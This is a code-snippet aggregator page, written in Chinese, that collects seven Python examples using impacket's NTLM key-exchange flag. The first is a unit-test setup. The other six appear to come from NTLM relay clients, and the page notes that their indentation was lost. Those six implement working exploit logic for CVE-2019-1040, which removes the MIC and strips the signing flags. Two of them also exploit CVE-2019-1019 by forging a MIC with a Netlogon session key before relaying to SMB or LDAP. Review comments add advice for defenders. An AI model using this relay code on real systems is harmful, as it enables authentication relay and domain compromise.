本文整理匯總了Python中impacket.ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的典型用法代碼示例。如果您正苦於以下問題:Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的具體用法?Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH怎麼用?Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH使用的例子?那麼, 這裏精選的屬性代碼示例或許可以為您提供幫助。您也可以進一步了解該屬性所在類impacket.ntlm的用法示例。
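在下文中一共展示了ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的7個代碼示例,這些例子默認根據受歡迎程度排序。您可以為喜歡或者感覺有用的代碼點讚,您的評價將有助於系統推薦出更棒的Python代碼示例。注意:示例2至示例7看來取自NTLM中繼(relay)客戶端代碼,其注釋標明與CVE-2019-1040、CVE-2019-1019相關;這些代碼片段的縮進在本頁中已丟失,語句的嵌套層級請以上游源碼為準。防禦方應確認目標主機已安裝對應的安全更新,並強制啟用SMB簽名、LDAP簽名與通道綁定。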
示例1: setUp
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def setUp(self):
    """Install the fixed NTLM inputs that the test methods read from ``self``.

    Every value is a constant, so the computed responses are reproducible.
    The constants look like the common test values of the MS-NLMP
    specification -- TODO confirm against the spec. They are public test
    material only: a constant session key, an all-zero timestamp and an
    all-zero nonce must never be used outside a test run.
    """
    # Switch impacket's ntlm module into its test-case mode.
    ntlm.TEST_CASE = True

    # Identity strings used when building the messages.
    self.user, self.domain, self.password = "User", "Domain", "Password"
    self.serverName, self.workstationName = "Server", "COMPUTER"

    # Deterministic key material and challenges.
    self.randomSessionKey = b("U" * 16)
    self.time = b('\x00' * 8)
    self.clientChallenge = b("\xaa" * 8)
    self.serverChallenge = b("\x01\x23\x45\x67\x89\xab\xcd\xef")

    # OR the negotiate flags together one at a time, in the original order.
    negotiated = 0
    for bit in (
        ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH,
        ntlm.NTLMSSP_NEGOTIATE_56,
        ntlm.NTLMSSP_NEGOTIATE_128,
        ntlm.NTLMSSP_NEGOTIATE_VERSION,
        ntlm.NTLMSSP_TARGET_TYPE_SERVER,
        ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN,
        ntlm.NTLMSSP_NEGOTIATE_NTLM,
        ntlm.NTLMSSP_NEGOTIATE_SEAL,
        ntlm.NTLMSSP_NEGOTIATE_SIGN,
        ntlm.NTLM_NEGOTIATE_OEM,
        ntlm.NTLMSSP_NEGOTIATE_UNICODE,
    ):
        negotiated |= bit
    self.flags = negotiated

    self.seqNum = 0
    self.nonce = b('\x00' * 16)
    self.plaintext = 'Plaintext'.encode('utf-16le')

    # Reminder for whoever runs the suite: the library source has to be
    # edited temporarily (fixed aTime) and restored afterwards.
    for reminder in (
        "## BEFORE RUNNING THESE TESTS",
        "Don't forget to set up aTime = '\\x00'*8 in computeResponseNTLMv2 otherwise the results won't be right. ",
        "Look for that in ntlm.py and uncomment the lines, comment the other ones and don't forget to revert everything back whenever finished testing",
        "Flags",
    ):
        print(reminder)

    # Dump the 32-bit little-endian encoding of the flag word.
    hexdump(struct.pack('<L', self.flags))
示例2: sendNegotiate
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendNegotiate(self, negotiateMessage):
# Parse the NTLM NEGOTIATE message, optionally rewrite its flags, send it to
# the server behind self.session and return the parsed CHALLENGE reply.
#
# negotiateMessage: serialized NEGOTIATE message (fed to fromString()).
# Returns: the NTLMAuthChallenge object built from the server's answer.
#
# NOTE(review): this listing lost its indentation, so which statements belong
# to the `remove_mic` branch cannot be read off this page -- confirm the
# nesting against the upstream file.
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared
# (XOR on a bit that the preceding test found set).
# NOTE(review): defender view -- a target carrying the security update for
# CVE-2019-1040, or one that enforces SMB signing, is expected to reject a
# session negotiated from a message altered this way.
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Re-serialize the (possibly modified) message.
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
# Pick the send routine by negotiated dialect: SMB_DIALECT goes through
# sendNegotiatev1, every other dialect through sendNegotiatev2.
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
# Keep the serialized NEGOTIATE and CHALLENGE messages on the instance for
# later use by other methods.
self.negotiateMessage = negotiateMessage
self.challengeMessage = challenge.getData()
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
self.serverChallenge = challenge['challenge']
return challenge
示例3: sendNegotiate
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendNegotiate(self, negotiateMessage):
# Parse the NTLM NEGOTIATE message, optionally rewrite its flags, send it to
# the server behind self.session and return the parsed CHALLENGE reply.
#
# negotiateMessage: serialized NEGOTIATE message (fed to fromString()).
# Returns: the NTLMAuthChallenge object built from the server's answer.
#
# NOTE(review): this listing lost its indentation, so which statements belong
# to the `remove_mic` branch cannot be read off this page -- confirm the
# nesting against the upstream file.
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared
# (XOR on a bit that the preceding test found set).
# NOTE(review): defender view -- a target carrying the security update for
# CVE-2019-1040, or one that enforces SMB signing, is expected to reject a
# session negotiated from a message altered this way.
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Re-serialize the (possibly modified) message.
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
# Pick the send routine by negotiated dialect: SMB_DIALECT goes through
# sendNegotiatev1, every other dialect through sendNegotiatev2.
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
return challenge
示例4: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
# Parse the NTLM AUTHENTICATE message, optionally strip signing-related
# fields, make sure it is wrapped in a SPNEGO NegTokenResp, and send it.
#
# authenticateMessageBlob: serialized AUTHENTICATE message (fed to
#   NTLMAuthChallengeResponse.fromString()).
# serverChallenge: passed through unchanged to sendAuthv1 / sendAuthv2.
# Returns: the (token, errorCode) pair produced by sendAuthv1 / sendAuthv2.
#
# NOTE(review): this listing lost its indentation, so it is not visible here
# whether the MIC/Version resets and the getData() call sit inside the
# `remove_mic` branch -- confirm the nesting against the upstream file.
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared.
# NOTE(review): defender view -- a target carrying the security update for
# CVE-2019-1040, or one that enforces SMB signing, is expected to reject an
# AUTHENTICATE message whose MIC was removed.
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Empty the MIC and Version fields and set their lengths to zero, then
# re-serialize the message.
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
# The first byte is compared with the NegTokenResp tag to decide whether the
# blob is already a SPNEGO response token.
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
# SMB_DIALECT uses sendAuthv1; every other dialect uses sendAuthv2.
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
return token, errorCode
示例5: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
# Parse the NTLM AUTHENTICATE message, optionally strip signing-related
# fields or recompute its MIC, wrap it in a SPNEGO NegTokenResp, and send it.
#
# authenticateMessageBlob: serialized AUTHENTICATE message (fed to
#   NTLMAuthChallengeResponse.fromString()).
# serverChallenge: passed through unchanged to sendAuthv1 / sendAuthv2.
# Returns: the (token, errorCode) pair produced by sendAuthv1 / sendAuthv2.
#
# NOTE(review): this listing lost its indentation, so it is not visible here
# which statements sit inside the `remove_mic` and `remove_target` branches
# -- confirm the nesting against the upstream file.
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared.
# NOTE(review): defender view -- a target carrying the security update for
# CVE-2019-1040, or one that enforces SMB signing, is expected to reject an
# AUTHENTICATE message whose MIC was removed.
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Empty the MIC and Version fields and set their lengths to zero, then
# re-serialize the message.
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
# The first byte is compared with the NegTokenResp tag to decide whether the
# blob is already a SPNEGO response token.
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
# Stays None unless the remove_target path below supplies a key; a truthy
# value later switches session signing on.
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina and @YaronZi
# NOTE(review): defender view -- this path depends on
# self.netlogonSessionKey() returning a usable key; a domain controller
# with the security update for CVE-2019-1019 is expected not to hand it out.
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
# `res` is parsed here but not read again in this listing.
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
# Bytes 0x48..0x57 (16 bytes) are zeroed before the HMAC-MD5 is taken over
# NEGOTIATE + CHALLENGE + AUTHENTICATE; the digest is then written back at
# the same offset. Presumably that range is the MIC field -- TODO confirm
# against MS-NLMP.
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
# SMB_DIALECT uses sendAuthv1; every other dialect uses sendAuthv2. The
# errorCode assigned here replaces any value set by netlogonSessionKey().
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode
示例6: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
# Extract the NTLM AUTHENTICATE message (unwrapping SPNEGO when present),
# optionally strip signing-related fields, and submit it as an LDAP bind.
#
# authenticateMessageBlob: raw NTLM message or a SPNEGO NegTokenResp that
#   carries it in 'ResponseToken'.
# serverChallenge: not used in the visible body.
# Returns: (None, STATUS_SUCCESS) when the bind result is RESULT_SUCCESS,
#   otherwise (None, STATUS_ACCESS_DENIED).
# Raises: LDAPRelayClientException when the server answers
#   RESULT_STRONGER_AUTH_REQUIRED and PLUGIN_NAME is not 'LDAPS'.
#
# NOTE(review): this listing lost its indentation, so the extent of the
# `remove_mic` branch and of the `with` block is not visible here -- confirm
# the nesting against the upstream file.
if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
token = respToken2['ResponseToken']
else:
token = authenticateMessageBlob
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(token)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared.
# NOTE(review): defender view -- a server carrying the security update for
# CVE-2019-1040 is expected to reject an AUTHENTICATE message whose MIC was
# removed.
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Empty the MIC and Version fields and set their lengths to zero, then
# re-serialize the message.
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
token = authMessage.getData()
# The bind exchange runs while holding the session's connection_lock.
with self.session.connection_lock:
# The token is stored on self, and self is handed to bind_operation as the
# NTLM client object for the 'SICILY_RESPONSE_NTLM' bind.
self.authenticateMessageBlob = token
request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
self.session.sasl_in_progress = False
if result['result'] == RESULT_SUCCESS:
self.session.bound = True
self.session.refresh_server_info()
return None, STATUS_SUCCESS
else:
# RESULT_STRONGER_AUTH_REQUIRED on a non-LDAPS connection is reported as the
# server enforcing LDAP signing -- i.e. that setting blocks this bind.
# NOTE(review): defender view -- for LDAP over TLS the matching control is
# LDAP channel binding; enforce both signing and channel binding.
if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
raise LDAPRelayClientException('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
return None, STATUS_ACCESS_DENIED
#This is a fake function for ldap3 which wants an NTLM client with specific methods
示例7: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
# Parse the NTLM AUTHENTICATE message, optionally strip signing-related
# fields or recompute its MIC, wrap it in a SPNEGO NegTokenResp, and send it.
#
# authenticateMessageBlob: serialized AUTHENTICATE message (fed to
#   NTLMAuthChallengeResponse.fromString()).
# serverChallenge: passed through unchanged to sendAuthv1 / sendAuthv2.
# Returns: the (token, errorCode) pair produced by sendAuthv1 / sendAuthv2.
#
# NOTE(review): this listing lost its indentation, so it is not visible here
# which statements sit inside the `remove_mic` and `remove_target` branches
# -- confirm the nesting against the upstream file.
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# CVE-2019-1040 handling: with serverConfig.remove_mic set, each of the
# SIGN, ALWAYS_SIGN, KEY_EXCH and VERSION bits that is present is cleared.
# NOTE(review): defender view -- a target carrying the security update for
# CVE-2019-1040, or one that enforces SMB signing, is expected to reject an
# AUTHENTICATE message whose MIC was removed.
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
# Empty the MIC and Version fields and set their lengths to zero, then
# re-serialize the message.
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
# The first byte is compared with the NegTokenResp tag to decide whether the
# blob is already a SPNEGO response token.
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
# Stays None unless the remove_target path below supplies a key; a truthy
# value later switches session signing on.
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina
# NOTE(review): defender view -- this path depends on
# self.netlogonSessionKey() returning a usable key; a domain controller
# with the security update for CVE-2019-1019 is expected not to hand it out.
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
# `res` is parsed here but not read again in this listing.
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
# Bytes 0x48..0x57 (16 bytes) are zeroed before the HMAC-MD5 is taken over
# NEGOTIATE + CHALLENGE + AUTHENTICATE; the digest is then written back at
# the same offset. Presumably that range is the MIC field -- TODO confirm
# against MS-NLMP.
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
# SMB_DIALECT uses sendAuthv1; every other dialect uses sendAuthv2. The
# errorCode assigned here replaces any value set by netlogonSessionKey().
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode